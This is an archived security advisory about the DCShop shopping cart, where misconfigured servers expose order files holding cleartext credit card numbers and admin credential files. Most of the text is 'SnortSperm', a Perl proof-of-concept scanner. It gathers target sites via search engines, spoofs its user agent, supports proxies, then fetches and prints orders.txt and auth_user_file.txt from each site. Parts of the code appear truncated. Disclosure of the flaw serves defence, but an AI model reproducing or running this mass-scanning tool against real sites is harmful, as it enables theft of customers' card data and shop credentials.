TUCoPS :: Web :: e-commerce, shopping carts :: dcshop1.htm

DCShop - retrieve cleartext credit cards





    Peter Helms found  following.  There  are several Web  shops using
    your DCShop product as E-commerce system, where it is possble  for
    unauthorized  persons  via  a  Web  browser  to  retrieve customer
    creditcard numbers in cleartext.  Athough the developers on  their
    Web site  recommends not  to use  the beta  product for commercial
    use, there are sites already using it commercially.

    The issue does  not show up  on properly configured  servers, i.e.
    where the  "Everyone"-group has  "Full Access"  to the  CGI-BIN or
    sub-folders, more info below.

    The requests are made of the following URL:


    This will triger the Web host to send a text file with all  recent
    orders, including the end-users name, shipping and billing-address
    e-mail address AND CREDIT CARD NUMBERS with exp-dates.

    It is also in some  cases possible to find the  administrator name
    and password in another text file from an URL:


    This is not  really a vulnerability.   It is more  a server  setup
    problem.   Normally, you  should not  be able  to browse  files in
    /cgi-bin directory;  you should  only be  able to  execute scripts
    and display the page resulting from  them.  BUT, we do live  in an
    imperfect  world  and  some  server  DO  allow viewing of files in
    /cgi-bin directory and so IT IS a problem, nonetheless.

    # SnortSperm v1.1, a DCShop (Web shopping cart system) order and account scanner
    # by darkman, with help of antistar and bsl4
    # A proof of concept
    # Users running windows have to download and install ActivePerl from
    # www.activeperl.com, and run the script from the MS-DOS Prompt by typing:
    # \perl\bin\perl <path of ss.pl>\ss.pl
    # I'd like to thank Peter Helms for publishing the information regarding this
    # exploit.
    # E-mail: darkman@coderz.net
    # Homepage: www.coderz.net/darkman
    use LWP::Simple;
    use LWP::UserAgent;
    my $ua=new LWP::UserAgent;
    # flush stdout (so we get 'in progress' messages)
    # fake useragent
    $ua->agent("Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)");
    # hash arrays
    my %unique_urls;
    my %unique_sites;
    my %flatfiles;
    my %pathfiles;
    my %additional_paths;
    my %vulnerable_sites;
    # scanning using search engine
    sub scan_search_engine {
	    $url = shift;
	    print STDERR ".";
	    @urls = split /\n/, get($url);
	    for (@urls) {
		    if (/$link/) {
			    $1 =~ /(.*)\/.*$/;
			    $_ = $1;
		    scan_search_engine("$search_engine_url$1") if (/$next/);
    # path traversal
    sub path_traversal {
	    $_ = "http://$_" if (not /:\/\//);
	    @split_url = split /\//, $_;
	    $unique_sites{$split_url[2]} = $split_url[2];
	    additional_urls() if ((scalar keys %additional_paths!=0) && ($_ ne ''));
	    while (not /:\/$/) {
		    $_ = substr $_,0,rindex $_,"/";
    # additional urls
    sub additional_urls {
	    foreach $path (keys %additional_paths) {
		    if ($path =~ /^\//) {
			    $unique_urls{"$split_url[0]//$split_url[2]$path"} = "$split_url[0]//$split_url[2]$path";
		    } else {
			    $unique_urls{"$url/$path"} = "$url/$path";
    # scan url
    sub scan_url {
	    $first_try = shift;
	    $second_try = shift;
       	    $url_ = "$url/$first_try";
	    print STDERR "Trying $url_\n";
	    $page = get($url_);
	    @lines = split /\x0d/, $page;
	    if ((@lines+0 == 0) || ($lines[0] =~ /^</) || ($lines[0] =~ /^ </) || ($lines[0] =~ /^\n</)) {
		    $url_ = "$url/$second_try";
		    print STDERR "Trying $url_\n";
		    $page = get($url_);
		    @lines = split /\x0d/, $page;
	    if ((@lines+0 > 0) && (not $lines[0] =~ /^</) && (not $lines[0] =~ /^ </) && (not $lines[0] =~ /^\n</)) {
        	    print "$url_\n\n";
        	    for (@lines) {
			    $occurrences = ($_ =~ tr/|//);
			    $max_occurrences = $occurrences if ($occurrences > $max_occurrences);
			    if (/^\n</) {
				    print "\n";
        		    print "$_";
        	    print "\n";
        	    print "\n" if ($occurrences == 1);
        	    print STDERR "Success.\n";
    # check arguements
    foreach $opt (@ARGV) {
	    $proxyserver = $1 if ($opt =~ "proxy=(.*)");
	    $proxyport = $1 if ($opt =~ "port=(.*)");
	    $altavista = 1 if ($opt eq "altavista");
	    $google = 1 if ($opt eq "google");
	    $lycos = 1 if ($opt eq "lycos");
	    $nbci = 1 if ($opt eq "nbci");
	    $netscape = 1 if ($opt eq "netscape");
	    $yahoo = 1 if ($opt eq "yahoo");
	    $flatfiles{$1} = $1 if ($opt =~ "flatfile=(.*)");
	    $pathfiles{$1} = $1 if ($opt =~ "pathfile=(.*)");
    print STDERR "SnortSperm v1.1, a DCShop (Web shopping cart system) order and account scanner\n";
    # show options if no valid arguements were found
    if (!($altavista or $google or $lycos or $nbci or $netscape or $yahoo) && (scalar keys %flatfiles==0)) {
	    print STDERR "usage: ./ss.pl <options>\n\nproxy=<proxyserver> for scanning using a proxy server\nport=<proxyport> for specifying proxy port (default proxy port is 8080)\naltavista for scanning using AltaVista\ngoogle for scanning using Google\nlycos for scanning using Lycos\nnbci for scanning using NBCi (use additional paths with this option)\nnetscape for scanning using Netscape Search\nyahoo for scanning using Yahoo!\nflatfile=<filename> for scanning using a flat file\npathfile=<filename> for additional paths\n\noptions can be combined";
    # load additional paths
    foreach $pathfile (keys %pathfiles) {
	    if ($pathfile ne '') {
        	    open(FH, $pathfile);
        	    while (<FH>) {
        		    $_ = $1 if (/(.*)\/$/);
        		    $additional_paths{$_}=$_ if ($_ ne '');
    # scan through a proxy (insert proxyserver and port)
    if ($proxyserver) {
	    $proxyport = 8080 if (!$proxyport);
	    print STDERR "using $proxyserver:$proxyport as proxy\n";
    # scanning using selected search engines
    if ($altavista) {
	    print STDERR "\nScanning using AltaVista";
	    $search_engine_url = "http://www.altavista.com";
	    $link = "status='([^']*)";
	    $next = "a href=\"([^\"]+).*\\[Next";
    if ($google) {
	    print STDERR "\nScanning using Google";
	    $search_engine_url = "http://www.google.com";
	    $link = "<p><A HREF=([^>]*)";
	    $next = "A HREF=([^>]+).*<b>Next<\\/b>";
    if ($lycos) {
	    print STDERR "\nScanning using Lycos";
	    $search_engine_url = "http://www.lycos.co.uk";
	    $link = "<b><a href=\"([^\"]*)";
	    $next = "A HREF=([^>]+).*<B>Forward<\\/B>";
    if ($nbci) {
	    print STDERR "\nScanning using NBCi";
	    $search_engine_url = "http://www.goto.com";
	    $link = "<em>([^<]*)";
	    $next = "a href=\"([^\"]+).*<b>More";
    if ($netscape) {
	    print STDERR "\nScanning using Netscape Search";
	    $search_engine_url = "http://search.netscape.com";
	    $link = "size=\"1\">([^<]*)";
	    $next = "a href=\"([^\"]+).*next>>";
    if ($yahoo) {
	    print STDERR "\nScanning using Yahoo!";
	    $search_engine_url = "http://google.yahoo.com";
	    $link = "#006600>([^&]*)";
	    $next = "a href=\"([^\"]+).*Next 20 ";
    # scanning using flat file(s)
    foreach $flatfile (keys %flatfiles) {
	    if ($flatfile ne '') {
		    print STDERR "\nScanning using flat file: $flatfile";
        	    open(FH, $flatfile);
        	    while (<FH>) {
        		    $_ = $1 if (/(.*)\/$/);
    # show number of sites found
    $total_urls = 4*scalar keys %unique_urls;
    $total_sites = scalar keys %unique_sites;
    print STDERR "\nFound $total_urls URLs at $total_sites sites to scan\n";
    # scan for vulnerable sites
    foreach $url (sort(keys %unique_urls)) {
	    @split_url = split /\//, $url;
	    $stripped_url ="$split_url[0]//$split_url[2]";
	    if ($current_url ne $stripped_url) {
		    $current_url = $stripped_url;
		    print STDERR "\n";
	    $filename = "/orders.txt";
	    scan_url("Orders$filename","orders$filename") if (!$vulnerable_sites{"$stripped_url$filename"});
	    $filename = "/auth_user_file.txt";
	    scan_url("Auth_data$filename","auth_data$filename") if (!$vulnerable_sites{"$stripped_url$filename"});




    This has been reported to the developer, DCscripts.com, who within
    hours  posted  a  security  issue  bulletin  on  their web site to
    clarify the recommendations for their software:


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